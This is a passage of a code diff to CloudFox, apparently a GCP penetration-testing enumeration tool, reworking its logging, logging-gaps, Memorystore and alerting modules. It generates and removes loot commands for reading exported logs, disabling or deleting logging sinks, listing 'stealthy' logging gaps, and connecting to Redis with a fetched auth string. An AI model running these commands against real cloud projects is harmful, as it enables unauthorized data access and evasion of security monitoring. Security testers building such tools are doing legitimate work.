(%s)\n"+ - "# Disabled: %v\n\n"+ - "# Read logs from destination:\n", - sink.Name, sink.ProjectID, - sink.DestinationType, getDestinationName(sink), - sink.Disabled, - ) - - switch sink.DestinationType { - case "storage": - m.LootMap["logging-exploitation"].Contents += fmt.Sprintf( - "gsutil ls gs://%s/\n"+ - "gsutil cat gs://%s/**.json | head -100\n\n", - sink.DestinationBucket, sink.DestinationBucket, - ) - case "bigquery": - m.LootMap["logging-exploitation"].Contents += fmt.Sprintf( - "bq query --use_legacy_sql=false 'SELECT * FROM `%s.%s.*` LIMIT 100'\n\n", - sink.DestinationProject, sink.DestinationDataset, - ) - case "pubsub": - m.LootMap["logging-exploitation"].Contents += fmt.Sprintf( - "# Create subscription to capture logs:\n"+ - "gcloud pubsub subscriptions create log-capture --topic=%s --project=%s\n"+ - "gcloud pubsub subscriptions pull log-capture --limit=10 --auto-ack --project=%s\n\n", - sink.DestinationTopic, sink.DestinationProject, sink.DestinationProject, - ) - } - - m.LootMap["logging-exploitation"].Contents += fmt.Sprintf( - "# Disable sink (if you have logging.sinks.update):\n"+ - "gcloud logging sinks update %s --disabled --project=%s\n\n"+ - "# Delete sink (if you have logging.sinks.delete):\n"+ - "gcloud logging sinks delete %s --project=%s\n\n", - sink.Name, sink.ProjectID, - sink.Name, sink.ProjectID, +func (m *LoggingModule) addMetricToLoot(metric LoggingService.MetricInfo) { + m.LootMap["metrics-commands"].Contents += fmt.Sprintf( + "# Metric: %s (Project: %s)\n"+ + "gcloud logging metrics describe %s --project=%s\n\n", + metric.Name, metric.ProjectID, + metric.Name, metric.ProjectID, ) } @@ -375,6 +294,7 @@ func (m *LoggingModule) writeOutput(ctx context.Context, logger internal.Logger) "Destination", "Cross-Project", "Disabled", + "Writer Identity", "Filter", } @@ -392,13 +312,19 @@ func (m *LoggingModule) writeOutput(ctx context.Context, logger internal.Logger) // Format disabled disabled := "No" if sink.Disabled { - disabled = "YES" + disabled = "Yes" } - // Format filter + // Format filter (no truncation) filter := "-" if sink.Filter != "" { - filter = truncateFilter(sink.Filter) + filter = normalizeFilter(sink.Filter) + } + + // Format writer identity + writerIdentity := "-" + if sink.WriterIdentity != "" { + writerIdentity = sink.WriterIdentity } sinksBody = append(sinksBody, []string{ @@ -409,6 +335,7 @@ func (m *LoggingModule) writeOutput(ctx context.Context, logger internal.Logger) destination, crossProject, disabled, + writerIdentity, filter, }) } @@ -425,21 +352,24 @@ func (m *LoggingModule) writeOutput(ctx context.Context, logger internal.Logger) var metricsBody [][]string for _, metric := range m.Metrics { - // Format description - description := metric.Description - if len(description) > 40 { - description = description[:37] + "..." + // Format filter (no truncation) + filter := "-" + if metric.Filter != "" { + filter = normalizeFilter(metric.Filter) } - // Format filter - filter := truncateFilter(metric.Filter) - // Format type metricType := metric.MetricKind if metric.ValueType != "" { metricType += "/" + metric.ValueType } + // Format description (no truncation) + description := metric.Description + if description == "" { + description = "-" + } + metricsBody = append(metricsBody, []string{ m.GetProjectName(metric.ProjectID), metric.ProjectID, @@ -528,8 +458,8 @@ func getDestinationName(sink LoggingService.SinkInfo) string { } } -// truncateFilter truncates a log filter for display -func truncateFilter(filter string) string { +// normalizeFilter normalizes a log filter for display (removes newlines but no truncation) +func normalizeFilter(filter string) string { // Remove newlines filter = strings.ReplaceAll(filter, "\n", " ") filter = strings.ReplaceAll(filter, "\t", " ") @@ -539,90 +469,5 @@ func truncateFilter(filter string) string { filter = strings.ReplaceAll(filter, " ", " ") } - // Truncate - if len(filter) > 50 { - return filter[:47] + "..." - } - return filter -} - -// ------------------------------ -// Security Recommendations -// ------------------------------ - -// addSinkSecurityRecommendations generates security recommendations for a logging sink -func (m *LoggingModule) addSinkSecurityRecommendations(sink LoggingService.SinkInfo) { - var recommendations []string - - // Disabled sink - CRITICAL (log evasion) - if sink.Disabled { - recommendations = append(recommendations, - fmt.Sprintf("[CRITICAL] Sink %s is DISABLED - logs are not being exported\n"+ - " Risk: Potential log evasion or security monitoring gap\n"+ - " Fix: Re-enable the sink:\n"+ - " gcloud logging sinks update %s --no-disabled --project=%s\n", - sink.Name, - sink.Name, sink.ProjectID)) - } - - // Cross-project export - HIGH (data exfiltration risk) - if sink.IsCrossProject { - recommendations = append(recommendations, - fmt.Sprintf("[HIGH] Sink %s exports logs to different project: %s\n"+ - " Risk: Logs may be exfiltrated to external project\n"+ - " Review: Verify this cross-project export is authorized\n"+ - " gcloud logging sinks describe %s --project=%s\n", - sink.Name, sink.DestinationProject, - sink.Name, sink.ProjectID)) - } - - // Exclusion filters - HIGH (may hide malicious activity) - if len(sink.ExclusionFilters) > 0 { - recommendations = append(recommendations, - fmt.Sprintf("[HIGH] Sink %s has %d exclusion filter(s)\n"+ - " Risk: Exclusion filters may hide malicious activity from logs\n"+ - " Review: Verify exclusion filters are appropriate\n"+ - " gcloud logging sinks describe %s --project=%s\n", - sink.Name, len(sink.ExclusionFilters), - sink.Name, sink.ProjectID)) - } - - // No filter (exports all logs) - MEDIUM - if sink.Filter == "" { - recommendations = append(recommendations, - fmt.Sprintf("[MEDIUM] Sink %s has no filter - exports ALL logs\n"+ - " Risk: Sensitive logs may be exported, increased storage costs\n"+ - " Consider: Adding a filter to export only necessary logs\n"+ - " gcloud logging sinks update %s --log-filter='severity>=WARNING' --project=%s\n", - sink.Name, - sink.Name, sink.ProjectID)) - } - - // Storage destination without CMEK - LOW - if sink.DestinationType == "storage" { - recommendations = append(recommendations, - fmt.Sprintf("[LOW] Sink %s exports to Cloud Storage bucket: %s\n"+ - " Review: Verify bucket has appropriate encryption and access controls\n"+ - " gsutil iam get gs://%s\n", - sink.Name, sink.DestinationBucket, - sink.DestinationBucket)) - } - - // Pub/Sub destination - INFO (real-time access) - if sink.DestinationType == "pubsub" { - recommendations = append(recommendations, - fmt.Sprintf("[INFO] Sink %s exports to Pub/Sub topic: %s\n"+ - " Note: Logs are available in real-time via Pub/Sub\n"+ - " Review: Check who can subscribe to this topic\n"+ - " gcloud pubsub topics get-iam-policy %s --project=%s\n", - sink.Name, sink.DestinationTopic, - sink.DestinationTopic, sink.DestinationProject)) - } - - if len(recommendations) > 0 { - m.LootMap["logging-security-recommendations"].Contents += fmt.Sprintf( - "# Sink: %s (Project: %s)\n%s\n", - sink.Name, sink.ProjectID, - strings.Join(recommendations, "\n")) - } + return strings.TrimSpace(filter) } diff --git a/gcp/commands/logginggaps.go b/gcp/commands/logginggaps.go index 57290bc4..3aa77b7d 100644 --- a/gcp/commands/logginggaps.go +++ b/gcp/commands/logginggaps.go @@ -95,26 +95,11 @@ func (m *LoggingGapsModule) Execute(ctx context.Context, logger internal.Logger) m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_LOGGINGGAPS_MODULE_NAME, m.processProject) if len(m.Gaps) == 0 { - logger.InfoM("No logging gaps found - environment has good logging coverage", globals.GCP_LOGGINGGAPS_MODULE_NAME) + logger.InfoM("No logging gaps found", globals.GCP_LOGGINGGAPS_MODULE_NAME) return } - // Count by stealth value - criticalCount := 0 - highCount := 0 - for _, gap := range m.Gaps { - switch gap.StealthValue { - case "CRITICAL": - criticalCount++ - case "HIGH": - highCount++ - } - } - logger.SuccessM(fmt.Sprintf("Found %d logging gap(s)", len(m.Gaps)), globals.GCP_LOGGINGGAPS_MODULE_NAME) - if criticalCount > 0 || highCount > 0 { - logger.InfoM(fmt.Sprintf("[STEALTH] %d CRITICAL, %d HIGH stealth value gaps!", criticalCount, highCount), globals.GCP_LOGGINGGAPS_MODULE_NAME) - } m.writeOutput(ctx, logger) } @@ -156,77 +141,32 @@ func (m *LoggingGapsModule) processProject(ctx context.Context, projectID string // Loot File Management // ------------------------------ func (m *LoggingGapsModule) initializeLootFiles() { - m.LootMap["logging-gaps-all"] = &internal.LootFile{ - Name: "logging-gaps-all", - Contents: "# All Logging Gaps\n# Generated by CloudFox\n\n", - } - m.LootMap["logging-gaps-critical"] = &internal.LootFile{ - Name: "logging-gaps-critical", - Contents: "# CRITICAL Stealth Value Gaps\n# Generated by CloudFox\n# Actions on these resources are essentially invisible\n\n", - } - m.LootMap["logging-gaps-stealth-commands"] = &internal.LootFile{ - Name: "logging-gaps-stealth-commands", - Contents: "# Commands for Stealthy Activity\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["logging-gaps-remediation"] = &internal.LootFile{ - Name: "logging-gaps-remediation", - Contents: "# Logging Gap Remediation\n# Generated by CloudFox\n# Recommendations for defenders\n\n", + m.LootMap["logging-gaps-commands"] = &internal.LootFile{ + Name: "logging-gaps-commands", + Contents: "# Logging Gaps Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } func (m *LoggingGapsModule) addGapToLoot(gap logginggapsservice.LoggingGap) { - // Add to all gaps - m.LootMap["logging-gaps-all"].Contents += fmt.Sprintf( - "## [%s] %s: %s\n"+ - "## Project: %s, Location: %s\n"+ - "## Status: %s\n"+ - "## Missing:\n", - gap.StealthValue, gap.ResourceType, gap.ResourceName, + m.LootMap["logging-gaps-commands"].Contents += fmt.Sprintf( + "## %s: %s (Project: %s, Location: %s)\n"+ + "# Status: %s\n"+ + "# Missing:\n", + gap.ResourceType, gap.ResourceName, gap.ProjectID, gap.Location, gap.LoggingStatus, ) for _, missing := range gap.MissingLogs { - m.LootMap["logging-gaps-all"].Contents += fmt.Sprintf("## - %s\n", missing) - } - m.LootMap["logging-gaps-all"].Contents += "\n" - - // Add critical gaps separately - if gap.StealthValue == "CRITICAL" { - m.LootMap["logging-gaps-critical"].Contents += fmt.Sprintf( - "## [CRITICAL] %s: %s\n"+ - "## Project: %s\n"+ - "## Missing Logs:\n", - gap.ResourceType, gap.ResourceName, - gap.ProjectID, - ) - for _, missing := range gap.MissingLogs { - m.LootMap["logging-gaps-critical"].Contents += fmt.Sprintf("## - %s\n", missing) - } - m.LootMap["logging-gaps-critical"].Contents += "\n" + m.LootMap["logging-gaps-commands"].Contents += fmt.Sprintf("# - %s\n", missing) } + m.LootMap["logging-gaps-commands"].Contents += "\n" - // Add stealth commands + // Add exploit commands if len(gap.ExploitCommands) > 0 { - m.LootMap["logging-gaps-stealth-commands"].Contents += fmt.Sprintf( - "## [%s] %s: %s (%s)\n", - gap.StealthValue, gap.ResourceType, gap.ResourceName, gap.ProjectID, - ) for _, cmd := range gap.ExploitCommands { - m.LootMap["logging-gaps-stealth-commands"].Contents += cmd + "\n" - } - m.LootMap["logging-gaps-stealth-commands"].Contents += "\n" - } - - // Add remediation - if len(gap.Recommendations) > 0 { - m.LootMap["logging-gaps-remediation"].Contents += fmt.Sprintf( - "## %s: %s (%s)\n", - gap.ResourceType, gap.ResourceName, gap.ProjectID, - ) - for _, rec := range gap.Recommendations { - m.LootMap["logging-gaps-remediation"].Contents += fmt.Sprintf("# %s\n", rec) + m.LootMap["logging-gaps-commands"].Contents += cmd + "\n" } - m.LootMap["logging-gaps-remediation"].Contents += "\n" + m.LootMap["logging-gaps-commands"].Contents += "\n" } } @@ -234,79 +174,44 @@ func (m *LoggingGapsModule) addGapToLoot(gap logginggapsservice.LoggingGap) { // Output Generation // ------------------------------ func (m *LoggingGapsModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Main gaps table header := []string{ - "Stealth", + "Project ID", + "Project Name", "Type", "Resource", + "Location", "Status", "Missing Logs", - "Project Name", - "Project", } var body [][]string for _, gap := range m.Gaps { missingLogs := strings.Join(gap.MissingLogs, "; ") - if len(missingLogs) > 50 { - missingLogs = missingLogs[:50] + "..." + + location := gap.Location + if location == "" { + location = "-" } body = append(body, []string{ - gap.StealthValue, + gap.ProjectID, + m.GetProjectName(gap.ProjectID), gap.ResourceType, gap.ResourceName, + location, gap.LoggingStatus, missingLogs, - m.GetProjectName(gap.ProjectID), - gap.ProjectID, - }) - } - - // Summary by type table - typeHeader := []string{ - "Resource Type", - "Count", - "Critical", - "High", - } - - typeCounts := make(map[string]struct { - total int - critical int - high int - }) - - for _, gap := range m.Gaps { - counts := typeCounts[gap.ResourceType] - counts.total++ - if gap.StealthValue == "CRITICAL" { - counts.critical++ - } else if gap.StealthValue == "HIGH" { - counts.high++ - } - typeCounts[gap.ResourceType] = counts - } - - var typeBody [][]string - for resourceType, counts := range typeCounts { - typeBody = append(typeBody, []string{ - resourceType, - fmt.Sprintf("%d", counts.total), - fmt.Sprintf("%d", counts.critical), - fmt.Sprintf("%d", counts.high), }) } // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } - // Build tables tables := []internal.TableFile{ { Name: "logging-gaps", @@ -315,14 +220,6 @@ func (m *LoggingGapsModule) writeOutput(ctx context.Context, logger internal.Log }, } - if len(typeBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "logging-gaps-summary", - Header: typeHeader, - Body: typeBody, - }) - } - output := LoggingGapsOutput{ Table: tables, Loot: lootFiles, diff --git a/gcp/commands/memorystore.go b/gcp/commands/memorystore.go index 69ee5ad1..6defdb06 100644 --- a/gcp/commands/memorystore.go +++ b/gcp/commands/memorystore.go @@ -102,149 +102,56 @@ func (m *MemorystoreModule) processProject(ctx context.Context, projectID string } func (m *MemorystoreModule) initializeLootFiles() { - m.LootMap["memorystore-instances"] = &internal.LootFile{ - Name: "memorystore-instances", - Contents: "# Memorystore Redis Instances\n# Generated by CloudFox\n\n", - } - m.LootMap["memorystore-endpoints"] = &internal.LootFile{ - Name: "memorystore-endpoints", - Contents: "", - } - m.LootMap["memorystore-gcloud-commands"] = &internal.LootFile{ - Name: "memorystore-gcloud-commands", - Contents: "# Memorystore gcloud Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["memorystore-no-auth"] = &internal.LootFile{ - Name: "memorystore-no-auth", - Contents: "# Redis Instances WITHOUT Authentication\n# These instances have no AUTH - anyone with network access can connect\n# Generated by CloudFox\n\n", - } - m.LootMap["memorystore-no-encryption"] = &internal.LootFile{ - Name: "memorystore-no-encryption", - Contents: "# Redis Instances WITHOUT Transit Encryption\n# Traffic to these instances is unencrypted\n# Generated by CloudFox\n\n", - } - m.LootMap["memorystore-networks"] = &internal.LootFile{ - Name: "memorystore-networks", - Contents: "# Redis Instance Network Configuration\n# Shows which VPCs can access each instance\n# Generated by CloudFox\n\n", - } - m.LootMap["memorystore-exploitation"] = &internal.LootFile{ - Name: "memorystore-exploitation", - Contents: "# Memorystore Exploitation Commands\n# WARNING: Only use with proper authorization\n# Generated by CloudFox\n\n", - } - m.LootMap["memorystore-security-recommendations"] = &internal.LootFile{ - Name: "memorystore-security-recommendations", - Contents: "# Memorystore Security Recommendations\n# Generated by CloudFox\n\n", + m.LootMap["memorystore-commands"] = &internal.LootFile{ + Name: "memorystore-commands", + Contents: "# Memorystore Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } func (m *MemorystoreModule) addInstanceToLoot(instance memorystoreservice.RedisInstanceInfo) { - // Basic instance info - m.LootMap["memorystore-instances"].Contents += fmt.Sprintf( - "# Instance: %s\n# Host: %s:%d\n# Auth: %v\n# Encryption: %s\n\n", - instance.Name, - instance.Host, - instance.Port, - instance.AuthEnabled, - instance.TransitEncryption, + m.LootMap["memorystore-commands"].Contents += fmt.Sprintf( + "## Instance: %s (Project: %s, Location: %s)\n"+ + "# Host: %s:%d\n"+ + "# Auth: %v, Encryption: %s\n\n", + instance.Name, instance.ProjectID, instance.Location, + instance.Host, instance.Port, + instance.AuthEnabled, instance.TransitEncryption, ) - m.LootMap["memorystore-endpoints"].Contents += fmt.Sprintf("%s:%d\n", instance.Host, instance.Port) // gcloud commands - m.LootMap["memorystore-gcloud-commands"].Contents += fmt.Sprintf( - "# Instance: %s (Project: %s, Region: %s)\n"+ - "gcloud redis instances describe %s --region=%s --project=%s\n"+ - "gcloud redis instances get-auth-string %s --region=%s --project=%s\n\n", - instance.Name, instance.ProjectID, instance.Location, - instance.Name, instance.Location, instance.ProjectID, + m.LootMap["memorystore-commands"].Contents += fmt.Sprintf( + "# Describe instance:\n"+ + "gcloud redis instances describe %s --region=%s --project=%s\n\n", instance.Name, instance.Location, instance.ProjectID, ) - // No-auth instances - if !instance.AuthEnabled { - m.LootMap["memorystore-no-auth"].Contents += fmt.Sprintf( - "# INSTANCE: %s\n"+ - "# Project: %s\n"+ - "# Location: %s\n"+ - "# Host: %s:%d\n"+ - "# Network: %s\n"+ - "# RISK: No authentication - anyone with VPC access can connect!\n"+ - "redis-cli -h %s -p %d\n\n", - instance.Name, - instance.ProjectID, - instance.Location, - instance.Host, instance.Port, - extractNetworkName(instance.AuthorizedNetwork), - instance.Host, instance.Port, - ) - } - - // No-encryption instances - if instance.TransitEncryption == "DISABLED" || instance.TransitEncryption == "" { - m.LootMap["memorystore-no-encryption"].Contents += fmt.Sprintf( - "# INSTANCE: %s\n"+ - "# Project: %s\n"+ - "# Location: %s\n"+ - "# Host: %s:%d\n"+ - "# RISK: No transit encryption - traffic is unencrypted!\n"+ - "# Enable encryption (requires downtime):\n"+ - "gcloud redis instances update %s --region=%s --project=%s --transit-encryption-mode=SERVER_AUTHENTICATION\n\n", - instance.Name, - instance.ProjectID, - instance.Location, - instance.Host, instance.Port, + // Auth string command (if auth enabled) + if instance.AuthEnabled { + m.LootMap["memorystore-commands"].Contents += fmt.Sprintf( + "# Get auth string:\n"+ + "gcloud redis instances get-auth-string %s --region=%s --project=%s\n\n", instance.Name, instance.Location, instance.ProjectID, ) } - // Network configuration - m.LootMap["memorystore-networks"].Contents += fmt.Sprintf( - "# Instance: %s (Project: %s)\n"+ - "# Host: %s:%d\n"+ - "# Authorized Network: %s\n"+ - "# Connect Mode: %s\n"+ - "# Reserved IP Range: %s\n\n", - instance.Name, instance.ProjectID, - instance.Host, instance.Port, - instance.AuthorizedNetwork, - instance.ConnectMode, - instance.ReservedIPRange, - ) - - // Exploitation commands + // Redis CLI connection command authStr := "" if instance.AuthEnabled { authStr = " -a $(gcloud redis instances get-auth-string " + instance.Name + " --region=" + instance.Location + " --project=" + instance.ProjectID + " --format='value(authString)')" } - m.LootMap["memorystore-exploitation"].Contents += fmt.Sprintf( - "# Instance: %s (Project: %s)\n"+ - "# Host: %s:%d\n"+ - "# Auth: %v, Encryption: %s\n"+ - "# Risk Level: %s\n\n"+ - "# Connect to Redis (from a VM in the same VPC):\n"+ - "redis-cli -h %s -p %d%s\n\n"+ - "# Common Redis commands for enumeration:\n"+ - "# INFO - Server info and stats\n"+ - "# CONFIG GET * - All configuration\n"+ - "# KEYS * - List all keys (CAREFUL: may be slow)\n"+ - "# SCAN 0 COUNT 100 - Iterate keys safely\n"+ - "# GET key - Get value\n"+ - "# DBSIZE - Number of keys\n\n", - instance.Name, instance.ProjectID, - instance.Host, instance.Port, - instance.AuthEnabled, instance.TransitEncryption, - instance.RiskLevel, + m.LootMap["memorystore-commands"].Contents += fmt.Sprintf( + "# Connect to Redis (from a VM in the same VPC):\n"+ + "redis-cli -h %s -p %d%s\n\n", instance.Host, instance.Port, authStr, ) - - // Add security recommendations - m.addRedisSecurityRecommendations(instance) } // extractNetworkName extracts the network name from the full resource path func extractNetworkName(network string) string { if network == "" { - return "default" + return "-" } parts := strings.Split(network, "/") if len(parts) > 0 { @@ -253,111 +160,49 @@ func extractNetworkName(network string) string { return network } -// addRedisSecurityRecommendations generates security recommendations for a Redis instance -func (m *MemorystoreModule) addRedisSecurityRecommendations(instance memorystoreservice.RedisInstanceInfo) { - var recommendations []string - - // No authentication - CRITICAL - if !instance.AuthEnabled { - recommendations = append(recommendations, - fmt.Sprintf("[CRITICAL] Instance %s has NO authentication enabled\n"+ - " Risk: Anyone with network access to the VPC can connect and read/write data\n"+ - " Fix: Enable AUTH (requires recreating instance):\n"+ - " gcloud redis instances create %s-new --region=%s --project=%s --auth-enabled\n", - instance.Name, - instance.Name, instance.Location, instance.ProjectID)) - } - - // No transit encryption - HIGH - if instance.TransitEncryption == "DISABLED" || instance.TransitEncryption == "" { - recommendations = append(recommendations, - fmt.Sprintf("[HIGH] Instance %s has NO transit encryption\n"+ - " Risk: Redis traffic can be sniffed on the network\n"+ - " Fix: Enable transit encryption:\n"+ - " gcloud redis instances update %s --region=%s --project=%s --transit-encryption-mode=SERVER_AUTHENTICATION\n", - instance.Name, - instance.Name, instance.Location, instance.ProjectID)) - } - - // Basic tier (no HA) - MEDIUM - if instance.Tier == "BASIC" { - recommendations = append(recommendations, - fmt.Sprintf("[MEDIUM] Instance %s uses BASIC tier (no high availability)\n"+ - " Risk: Single point of failure, no automatic failover\n"+ - " Consider: Upgrading to STANDARD_HA tier for production workloads\n"+ - " gcloud redis instances create %s-ha --region=%s --project=%s --tier=STANDARD_HA\n", - instance.Name, - instance.Name, instance.Location, instance.ProjectID)) - } - - // Default network - LOW - if strings.Contains(instance.AuthorizedNetwork, "/default") { - recommendations = append(recommendations, - fmt.Sprintf("[LOW] Instance %s is connected to the default network\n"+ - " Risk: Default networks have broad firewall rules\n"+ - " Consider: Using a dedicated VPC with restricted access\n", - instance.Name)) - } - - // Old Redis version - INFO - if strings.HasPrefix(instance.RedisVersion, "REDIS_4") || strings.HasPrefix(instance.RedisVersion, "REDIS_5") { - recommendations = append(recommendations, - fmt.Sprintf("[INFO] Instance %s uses an older Redis version: %s\n"+ - " Note: Consider upgrading to Redis 7.x for better security and performance\n"+ - " gcloud redis instances upgrade %s --redis-version=redis_7_0 --region=%s --project=%s\n", - instance.Name, instance.RedisVersion, - instance.Name, instance.Location, instance.ProjectID)) - } - - if len(recommendations) > 0 { - m.LootMap["memorystore-security-recommendations"].Contents += fmt.Sprintf( - "# Instance: %s (Project: %s)\n%s\n", - instance.Name, instance.ProjectID, - strings.Join(recommendations, "\n")) - } -} - func (m *MemorystoreModule) writeOutput(ctx context.Context, logger internal.Logger) { header := []string{ + "Project Name", + "Project ID", "Name", "Location", "Tier", "Memory (GB)", "Version", "Host:Port", - "Auth", - "Encryption", + "Auth Enabled", + "Transit Encryption", "State", - "Risk", - "Project Name", - "Project", + "Network", + "Connect Mode", } var body [][]string for _, instance := range m.RedisInstances { - auth := "No" - if instance.AuthEnabled { - auth = "Yes" + transitEncryption := instance.TransitEncryption + if transitEncryption == "" { + transitEncryption = "DISABLED" } body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, instance.Name, instance.Location, instance.Tier, fmt.Sprintf("%d", instance.MemorySizeGB), instance.RedisVersion, fmt.Sprintf("%s:%d", instance.Host, instance.Port), - auth, - instance.TransitEncryption, + boolToYesNo(instance.AuthEnabled), + transitEncryption, instance.State, - instance.RiskLevel, - m.GetProjectName(instance.ProjectID), - instance.ProjectID, + extractNetworkName(instance.AuthorizedNetwork), + instance.ConnectMode, }) } var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/monitoringalerts.go b/gcp/commands/monitoringalerts.go index 262e3b5e..22206e00 100644 --- a/gcp/commands/monitoringalerts.go +++ b/gcp/commands/monitoringalerts.go @@ -23,6 +23,7 @@ const GCP_MONITORINGALERTS_MODULE_NAME string = "monitoring-alerts" var GCPMonitoringAlertsCommand = &cobra.Command{ Use: GCP_MONITORINGALERTS_MODULE_NAME, Aliases: []string{"alerts", "monitoring", "alerting"}, + Hidden: true, Short: "Enumerate Cloud Monitoring alerting policies and notification channels", Long: `Analyze Cloud Monitoring alerting policies and notification channels for security gaps. @@ -54,18 +55,14 @@ Requires appropriate IAM permissions: // ------------------------------ type AlertPolicy struct { - Name string - DisplayName string - ProjectID string - Enabled bool - ConditionCount int - NotificationCount int - Combiner string - CreationRecord string - MutationRecord string - Severity string - Documentation string - Conditions []AlertCondition + Name string + DisplayName string + ProjectID string + Enabled bool + Combiner string + Documentation string + Conditions []AlertCondition + NotificationChannels []string // Channel resource names } type AlertCondition struct { @@ -108,13 +105,6 @@ type UptimeCheck struct { SSLEnabled bool } -type AlertGap struct { - GapType string // missing-alert, disabled-alert, no-notification - Severity string - Description string - Recommendation string - AffectedArea string -} // ------------------------------ // Module Struct @@ -122,20 +112,11 @@ type AlertGap struct { type MonitoringAlertsModule struct { gcpinternal.BaseGCPModule - // Module-specific fields AlertPolicies []AlertPolicy NotificationChannels []NotificationChannel UptimeChecks []UptimeCheck - AlertGaps []AlertGap LootMap map[string]*internal.LootFile mu sync.Mutex - - // Tracking for gap analysis - hasIAMChangeAlert bool - hasFirewallChangeAlert bool - hasNetworkChangeAlert bool - hasSAKeyAlert bool - hasAuditLogAlert bool } // ------------------------------ @@ -165,7 +146,6 @@ func runGCPMonitoringAlertsCommand(cmd *cobra.Command, args []string) { AlertPolicies: []AlertPolicy{}, NotificationChannels: []NotificationChannel{}, UptimeChecks: []UptimeCheck{}, - AlertGaps: []AlertGap{}, LootMap: make(map[string]*internal.LootFile), } @@ -180,8 +160,6 @@ func runGCPMonitoringAlertsCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *MonitoringAlertsModule) Execute(ctx context.Context, logger internal.Logger) { - logger.InfoM("Analyzing Cloud Monitoring alerting configuration...", GCP_MONITORINGALERTS_MODULE_NAME) - // Create Monitoring client alertClient, err := monitoring.NewAlertPolicyClient(ctx) if err != nil { @@ -212,28 +190,15 @@ func (m *MonitoringAlertsModule) Execute(ctx context.Context, logger internal.Lo m.processProject(ctx, projectID, alertClient, channelClient, uptimeClient, logger) } - // Analyze for gaps - m.analyzeAlertGaps(logger) - // Check results - totalPolicies := len(m.AlertPolicies) - totalChannels := len(m.NotificationChannels) - totalGaps := len(m.AlertGaps) - - if totalPolicies == 0 && totalChannels == 0 { + if len(m.AlertPolicies) == 0 && len(m.NotificationChannels) == 0 { logger.InfoM("No monitoring alerts or notification channels found", GCP_MONITORINGALERTS_MODULE_NAME) - logger.InfoM("[CRITICAL] Projects have no alerting configured!", GCP_MONITORINGALERTS_MODULE_NAME) return } - logger.SuccessM(fmt.Sprintf("Found %d alert policy(ies), %d notification channel(s)", - totalPolicies, totalChannels), GCP_MONITORINGALERTS_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d alert policy(ies), %d notification channel(s), %d uptime check(s)", + len(m.AlertPolicies), len(m.NotificationChannels), len(m.UptimeChecks)), GCP_MONITORINGALERTS_MODULE_NAME) - if totalGaps > 0 { - logger.InfoM(fmt.Sprintf("[FINDING] Identified %d alerting gap(s)", totalGaps), GCP_MONITORINGALERTS_MODULE_NAME) - } - - // Write output m.writeOutput(ctx, logger) } @@ -278,34 +243,18 @@ func (m *MonitoringAlertsModule) enumerateAlertPolicies(ctx context.Context, pro } alertPolicy := AlertPolicy{ - Name: policy.Name, - DisplayName: policy.DisplayName, - ProjectID: projectID, - Enabled: policy.Enabled.GetValue(), - ConditionCount: len(policy.Conditions), - NotificationCount: len(policy.NotificationChannels), - Combiner: policy.Combiner.String(), + Name: policy.Name, + DisplayName: policy.DisplayName, + ProjectID: projectID, + Enabled: policy.Enabled.GetValue(), + Combiner: policy.Combiner.String(), + NotificationChannels: policy.NotificationChannels, } if policy.Documentation != nil { alertPolicy.Documentation = policy.Documentation.Content } - if policy.CreationRecord != nil { - alertPolicy.CreationRecord = policy.CreationRecord.MutateTime.AsTime().String() - } - - if policy.MutationRecord != nil { - alertPolicy.MutationRecord = policy.MutationRecord.MutateTime.AsTime().String() - } - - // Severity from user labels or documentation - if policy.UserLabels != nil { - if sev, ok := policy.UserLabels["severity"]; ok { - alertPolicy.Severity = sev - } - } - // Parse conditions for _, cond := range policy.Conditions { condition := AlertCondition{ @@ -325,7 +274,6 @@ func (m *MonitoringAlertsModule) enumerateAlertPolicies(ctx context.Context, pro condition.Duration = c.ConditionThreshold.Duration.String() } - // Extract metric type from filter condition.MetricType = m.extractMetricType(c.ConditionThreshold.Filter) } case *monitoringpb.AlertPolicy_Condition_ConditionAbsent: @@ -340,9 +288,6 @@ func (m *MonitoringAlertsModule) enumerateAlertPolicies(ctx context.Context, pro } alertPolicy.Conditions = append(alertPolicy.Conditions, condition) - - // Check for security-related alerts - m.checkSecurityAlert(condition.Filter, condition.DisplayName) } m.mu.Lock() @@ -478,202 +423,6 @@ func (m *MonitoringAlertsModule) enumerateUptimeChecks(ctx context.Context, proj } } -// ------------------------------ -// Security Alert Detection -// ------------------------------ -func (m *MonitoringAlertsModule) checkSecurityAlert(filter, displayName string) { - filterLower := strings.ToLower(filter) - nameLower := strings.ToLower(displayName) - - // IAM policy changes - if strings.Contains(filterLower, "setiampolicy") || - strings.Contains(filterLower, "iam_policy") || - strings.Contains(nameLower, "iam") { - m.mu.Lock() - m.hasIAMChangeAlert = true - m.mu.Unlock() - } - - // Firewall changes - if strings.Contains(filterLower, "compute.firewalls") || - strings.Contains(filterLower, "firewall") || - strings.Contains(nameLower, "firewall") { - m.mu.Lock() - m.hasFirewallChangeAlert = true - m.mu.Unlock() - } - - // Network changes - if strings.Contains(filterLower, "compute.networks") || - strings.Contains(filterLower, "vpc") || - strings.Contains(nameLower, "network") { - m.mu.Lock() - m.hasNetworkChangeAlert = true - m.mu.Unlock() - } - - // Service account key creation - if strings.Contains(filterLower, "serviceaccountkeys") || - strings.Contains(filterLower, "service_account_key") || - strings.Contains(nameLower, "service account key") { - m.mu.Lock() - m.hasSAKeyAlert = true - m.mu.Unlock() - } - - // Audit log configuration - if strings.Contains(filterLower, "auditconfig") || - strings.Contains(filterLower, "audit_config") || - 